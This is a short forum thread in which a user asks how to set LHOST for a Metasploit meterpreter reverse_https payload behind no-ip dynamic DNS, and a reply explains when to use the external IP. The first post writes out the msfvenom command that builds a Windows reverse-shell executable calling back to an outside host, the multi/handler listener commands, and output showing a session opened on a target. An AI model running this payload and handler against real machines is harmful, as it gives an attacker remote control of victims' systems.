Thread: meterpreter/reverse_https confusion

  1. #1
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    meterpreter/reverse_https confusion

    Hi all,

    I'm a bit confused as to the use of meterpreter/reverse_https.

    Maybe someone could shed some light on it.

    Before, I have used reverse_tcp and reverse_tcp_allports across the WAN to a public IP, then port forwarded to the local IP. Works, yeah!

    I want to use the no-ip client in Wine, which runs OK.
    Following the steps below, I come across the multi/handler = LHOST and it states the no-ip address *
    Shouldn't this be the local IP, or does this handler connect out and meet the reverse connection at the no-ip address without port forwarding to make the connection?

    Please advise.



    The command line below will generate a Windows executable that uses the new HTTPS stager:



    $ msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=consulting.example.org LPORT=4443 > metasploit_https.exe

    #This sequence of Metasploit Console commands will configure a listener to handle the requests:

    Using no-ip DUC client in wine to my no-ip address with port forwarded

    $ ./msfconsole

    msf> use exploit/multi/handler

    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https

    *msf exploit(handler) > set LHOST consulting.example.org (shouldn't this be the local host, i.e. 192.168.0.6?)

    msf exploit(handler) > set LPORT 4443

    msf exploit(handler) > set SessionCommunicationTimeout 0

    msf exploit(handler) > set ExitOnSession false

    msf exploit(handler) > exploit -j
    [*] Exploit running as background job.
    [*] Started HTTPS reverse handler on https://consulting.example.org:4443/
    [*] Starting the payload handler...





    Running the executable on the target results in:


    [*] 192.168.0.129:51375 Request received for /INITM...
    [*] 192.168.0.129:51375 Staging connection for target /INITM received...
    [*] Patched transport at offset 486516...
    [*] Patched URL at offset 486248...
    [*] Patched Expiration Timeout at offset 641856...
    [*] Patched Communication Timeout at offset 641860...
    [*] Meterpreter session 1 opened (192.168.0.3:4443 -> 192.168.0.129:51375) at 2011-06-29 02:43:55 -0500



    msf exploit(handler) > sessions -i 1
    [*] Starting interaction with 1...

    I thought this would be the local IP, as the no-ip DUC redirects the DNS to the public IP, which is then forwarded to the local IP. Maybe I'm wrong?


    Kind Regards
    Dee

  2. #2
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Re: meterpreter/reverse_https confusion

    Oh please!!!! 130 views, no feedback? Confusion sorted. Close thread.

  3. #3
    Junior Member L21ZIFER
    Join Date
    Nov 2011
    Posts
    47

    Re: meterpreter/reverse_https confusion

    First: There is a noip client for BT available already, try apt-get install noip2
    Second: When you try to redirect the exploited system to your computer externally (this means, the ex. system is not in your local network), then you obviously have to give your external IP to the LHOST var. If your exploited system is in your local network, then giving your local ip is enough.
